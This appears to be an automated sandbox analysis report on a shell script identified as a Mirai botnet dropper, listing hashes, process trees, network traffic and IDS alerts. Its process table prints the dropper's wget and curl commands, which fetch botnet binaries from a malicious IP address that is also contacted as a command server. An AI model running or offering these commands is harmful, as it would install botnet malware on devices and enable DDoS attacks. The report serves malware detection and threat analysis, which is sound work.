File name:	8UsA.sh
Full analysis:	https://app.any.run/tasks/b015273a-0a89-4f85-b8ea-baeb6392eb0d
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	January 10, 2025, 19:11:04
OS:	Ubuntu 22.04.2 LTS
Tags:	opendir mirai botnet
Indicators:
MIME:	text/x-shellscript
File info:	Bourne-Again shell script, ASCII text executable
MD5:	17BED510A00FCABA1DFAD2DE86D3F0AC
SHA1:	BD93C9B1642D9291731933387F1D751C85C6D323
SHA256:	7A091CE1DFCCDFFF5DB4938EBD85A0A088B255A1DDC0BAE4431E160316EF8995
SSDEEP:	24:vUQFsx4BPhzuJ/KWAssYAYLhlAdksqAksxtATFEIhPAPS:viqP2/KVssHYLYdJBkutATfI6

PID	CMD	Path	Indicators	Parent process
38760	/bin/sh -c "sudo chown user /home/user/Desktop/8UsA\.sh && chmod +x /home/user/Desktop/8UsA\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/8UsA\.sh "	/usr/bin/dash	—	any-guest-agent
User: user Integrity Level: UNKNOWN Exit code: 0
38761	sudo chown user /home/user/Desktop/8UsA.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38762	chown user /home/user/Desktop/8UsA.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
38763	chmod +x /home/user/Desktop/8UsA.sh	/usr/bin/chmod	—	dash
User: user Integrity Level: UNKNOWN Exit code: 0
38764	sudo -iu user /home/user/Desktop/8UsA.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38765	/bin/bash /home/user/Desktop/8UsA.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
38766	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38767	wget http://141.98.10.115/bins/UnHAnaAW.x86	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
38768	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 0
38769	curl -O http://141.98.10.115/bins/UnHAnaAW.x86	/snap/snapd/20290/usr/bin/snap	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0

PID	Process	Filename		Type
38767	wget	/tmp/UnHAnaAW.x86		o
		MD5:—	SHA256:—
38813	wget	/tmp/UnHAnaAW.mips		binary
		MD5:—	SHA256:—
38859	wget	/tmp/UnHAnaAW.mpsl		o
		MD5:—	SHA256:—
38975	wget	/tmp/UnHAnaAW.arm6		binary
		MD5:—	SHA256:—
39016	wget	/tmp/UnHAnaAW.arm7		o
		MD5:—	SHA256:—
39052	wget	/tmp/UnHAnaAW.ppc		binary
		MD5:—	SHA256:—
39095	wget	/tmp/UnHAnaAW.m68k		binary
		MD5:—	SHA256:—

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	—	169.150.255.184:443	https://odrs.gnome.org/1.0/reviews/api/ratings	unknown	—	—	—
38767	wget	GET	200	141.98.10.115:80	http://141.98.10.115/bins/UnHAnaAW.x86	unknown	—	—	malicious
—	—	GET	—	195.181.175.41:443	https://odrs.gnome.org/1.0/reviews/api/ratings	unknown	—	—	—
—	—	GET	—	207.211.211.26:443	https://odrs.gnome.org/1.0/reviews/api/ratings	unknown	—	—	—
—	—	GET	—	91.189.91.97:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
—	—	GET	204	91.189.91.98:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
—	—	GET	—	91.189.91.97:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
—	—	GET	200	141.98.10.115:80	http://141.98.10.115/bins/UnHAnaAW.mips	unknown	—	—	malicious
38901	wget	GET	404	141.98.10.115:80	http://141.98.10.115/bins/UnHAnaAW.arm4	unknown	—	—	malicious
38861	curl	GET	200	141.98.10.115:80	http://141.98.10.115/bins/UnHAnaAW.mpsl	unknown	—	—	malicious

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	91.189.91.97:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	91.189.91.98:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
—	—	212.102.56.178:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
—	—	169.150.255.180:443	odrs.gnome.org	—	GB	whitelisted
—	—	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
38767	wget	141.98.10.115:80	—	UAB Host Baltic	LT	malicious
—	—	141.98.10.115:80	—	UAB Host Baltic	LT	malicious
38813	wget	141.98.10.115:80	—	UAB Host Baltic	LT	malicious
38812	3AvA	141.98.10.115:1024	—	UAB Host Baltic	LT	malicious

Domain	IP	Reputation
connectivity-check.ubuntu.com	91.189.91.98 185.125.190.18 91.189.91.97 185.125.190.48 185.125.190.17 91.189.91.48 185.125.190.97 185.125.190.98 91.189.91.96 185.125.190.49 185.125.190.96 91.189.91.49 2620:2d:4000:1::97 2620:2d:4000:1::2b 2620:2d:4000:1::22 2001:67c:1562::24 2620:2d:4000:1::2a 2620:2d:4002:1::198 2620:2d:4000:1::98 2620:2d:4002:1::197 2620:2d:4000:1::96 2620:2d:4000:1::23 2001:67c:1562::23 2620:2d:4002:1::196	whitelisted
odrs.gnome.org	212.102.56.178 169.150.255.183 169.150.255.180 195.181.175.40 37.19.194.80 195.181.170.19 207.211.211.27 2a02:6ea0:c700::11 2a02:6ea0:c700::101 2a02:6ea0:c700::112 2a02:6ea0:c700::18 2a02:6ea0:c700::19 2a02:6ea0:c700::107 2a02:6ea0:c700::21	whitelisted
api.snapcraft.io	185.125.188.59 185.125.188.58 185.125.188.54 185.125.188.55 2620:2d:4000:1010::6d 2620:2d:4000:1010::117 2620:2d:4000:1010::42 2620:2d:4000:1010::2e6	whitelisted
google.com	142.250.184.238 2a00:1450:4001:831::200e	whitelisted
43.100.168.192.in-addr.arpa	—	unknown

PID	Process	Class	Message
38767	wget	Potentially Bad Traffic	ET INFO x86 File Download Request from IP Address
38767	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .x86
38767	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38861	curl	Potentially Bad Traffic	ET INFO x86 File Download Request from IP Address
38861	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
38861	curl	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .x86
38861	curl	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38861	curl	A Network Trojan was detected	AV INFO Possible Mirai .mips Executable Download
38861	curl	Potentially Bad Traffic	ET INFO MIPS File Download Request from IP Address
38861	curl	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP

General Info

8UsA.sh

17BED510A00FCABA1DFAD2DE86D3F0AC

BD93C9B1642D9291731933387F1D751C85C6D323

7A091CE1DFCCDFFF5DB4938EBD85A0A088B255A1DDC0BAE4431E160316EF8995

24:vUQFsx4BPhzuJ/KWAssYAYLhlAdksqAksxtATFEIhPAPS:viqP2/KVssHYLYdJBkutATfI6

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been detected (SURICATA)

SUSPICIOUS

Uses wget to download content

Executes commands using command-line interpreter

Modifies file or directory owner

Potential Corporate Privacy Violation

Connects to the server without a host name

Connects to unusual port

Reads /proc/mounts (likely used to find writable filesystems)

Contacting a server suspected of hosting an CnC

INFO

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings